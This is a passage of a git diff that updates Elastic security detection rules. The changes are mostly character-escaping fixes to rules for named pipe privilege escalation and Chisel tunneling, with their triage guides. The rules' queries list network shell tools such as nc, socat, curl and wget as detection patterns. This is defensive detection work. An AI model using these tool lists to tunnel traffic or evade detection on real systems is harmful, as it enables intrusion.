remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", "references": [ "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json index fc996cc21b3..e9336e78ad4 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", "references": [ "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json index 057d3b33bff..5c57b76aacb 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_104.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json index 264a532f2ed..e9cd9923d3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_105.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json index 71cacc53d8d..45c7086f6db 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_106.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json index d258d3815a6..d1b42bfa9d8 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json +++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_207.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json index 4a6342ae82d..e4cebf18544 100644 --- a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json index 80b33db6d25..c45b6fb33f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json index acccee96f1f..33637ec0b82 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json +++ b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_101.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json index 83cab64b497..a2bd70a57a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json +++ b/packages/security_detection_engine/kibana/security_rule/3f0e5410-a4bf-4e8c-bcfc-79d67a285c54_102.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -66,7 +66,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json index 08a6e3b94af..03b06445fb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Client", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count \u003e= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json index b97d8a659aa..4322e0ef65b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Client", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count \u003e= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json index fc2458c9db7..f2d85666983 100644 --- a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Client", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count \u003e= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_104.json index 436931f2f49..7c1d27ec996 100644 --- 